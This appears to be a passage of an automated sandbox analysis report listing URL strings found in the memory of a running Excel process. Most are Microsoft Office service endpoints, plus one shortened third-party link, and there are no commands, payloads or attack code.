Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insights.micro
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://invites.office.com/
Source: EXCEL.EXE, 00000000.00000002.4134385036.00000121DF3A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://link.saja.market/
Source: EXCEL.EXE, 00000000.00000002.4135387548.00000121DF9E8000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://link.saja.market/qORxZFFRU3
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://link.saja.market/qORxZFFRU3?
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://localhostMBI_SSLoutlook.live.comoutlook.live.comoutlook.office.comoutlook.office365.comoutlo
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://localhostattachment-sdf.office.netoutlook.live.comoutlook.office.comoutlook-sdf.office.comou
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://localhostotdsauth.ot2.opentext.comotdsauth.ot2.opentext.euauth.otds.ca.opw
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/err.srfr.srf
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srft.srfz
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_token.srfn.srf
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comHost
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DACD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comL
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA815000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/organizations
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/organizations#
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localR
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DB04D000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126494287.00000121DA8B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DAADC000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DAE79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.ashx
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/v2
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaspx
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DAADC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecs(
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizees
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefig
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelvupd
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA317000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen(
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepw
Source: EXCEL.EXE, 00000000.00000002.4114141390.00000121D7C5F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer(
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesnfo
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetinfoP
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev2/
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.comhttp://localhost:8011accounts.google.comgoogle.com
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA815000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/U
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA815000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.core.windows.net/
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.engagement.office.com/
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.lifecycle.office.com/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/mac15/search
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mobile.events.data.microsoft.co
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mss.office.com
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mss.office.com/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mysignins.microsoft&S
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ncus.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ncus.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://netdocuments/authbeta-vault.netvoyage.comvault.netvoyage.co
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/CloudSuggest/V1/V1AFy
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://notification.m365.svc.cloud.microsof7u:
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://notification.m365.svc.cloud.microsoft/:
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://notification.m365.svc.cloud.microsoft/PushNotifications.Register
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab3
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abss
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DAADC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/sharedwithme
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/v2.0/sharedwithme
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAE79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/locations/recent(
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/quickaccess/sitesandteams
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/v2/recent
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officea
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/help/clientdeveloper
Source: EXCEL.EXE, 00000000.00000002.4110954710.00000121CA3FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/H
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126710500.00000121DA9BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalog?lcid=1033&syslcid=8192&uilcid=1033&app=1&
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalogra
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/liveredir
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/manageserviceredir.aspxcr
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/serviceaddB
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/v
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/sta6
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/On
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/go%
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/google_32_1.pnghttps://odc.officeapps
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/google_48_1.pnghttps://odc.officeapps.:
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/google_6
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/google_80O
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/google_80_1.pnghttps://odc.officeapps.live.c
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/google_96_1.png57
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/onedrive_16_2.pnghttps://odc.officeapps.live.com/
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/par
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/N
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/NetDocuments/plus48.pn
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/OpenText/16.pnghttps://od
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/OpenText/80.pnghttps://odc.officeappsX
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/OpenText/K
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/citrix/32.pnghttps://odc.officeapps.
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/citrix/80.pnghttps://odc.)
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/iMa
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/iManage/32_CIM.pnghttps://od
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/partner/iManage/96_CIM.png10
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/sharepoint_16_2.pnghttps://odc.officeapps.live.co
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4128357658.00000121DAB1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellps:/
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellrvic
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net:
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/3:
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com;00
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comk
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeonline.ca.opentext.com/wopibootstrapperoffice-onlb
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officepyservice.office.net/ey
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officepyservice.office.net/service.functionality
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officepyservice.office.net/service.functionalityK
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps.live.com/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/nePrivacyse
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/OlsClient.svc/OlsClient
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/pin/
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/redemption/flighting/crosoft
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.c
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesnE
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiessKEs
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3E6000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com:namOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocat
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, 00000000.00000002.4134716123.00000121DF515000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4134652912.00000121DF4D4000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft
Source: EXCEL.EXE, 00000000.00000002.4134652912.00000121DF4D4000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DAE28000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4134439185.00000121DF3D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/
Source: EXCEL.EXE, 00000000.00000002.4134652912.00000121DF4D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/i
Source: EXCEL.EXE, 00000000.00000002.4134439185.00000121DF456000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF323000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4135387548.00000121DF9E8000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DB04D000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4111015462.00000121CA48F000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4134414541.00000121DF3C6000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4113838108.00000121D7AA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xml
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF323000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xml00
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF323000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xml:
Source: EXCEL.EXE, 00000000.00000002.4135387548.00000121DF9E8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xmls
Source: EXCEL.EXE, 00000000.00000002.4117012927.00000121DA4F7000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4111169327.00000121CA5D4000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4111015462.00000121CA48F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xml
Source: EXCEL.EXE, 00000000.00000002.4117012927.00000121DA4F7000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DB04D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmls
Source: EXCEL.EXE, 00000000.00000002.4117012927.00000121DA4F7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlsses
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA83A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft:443/rules/rule120201v19s19.xmlH
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA83A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsoft:443/rules/rule170146v0s19.xml
Source: EXCEL.EXE, 00000000.00000002.4134652912.00000121DF4D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.svc.static.microsofte
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owa/wopibootstrapperNA
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.off
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.offic
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
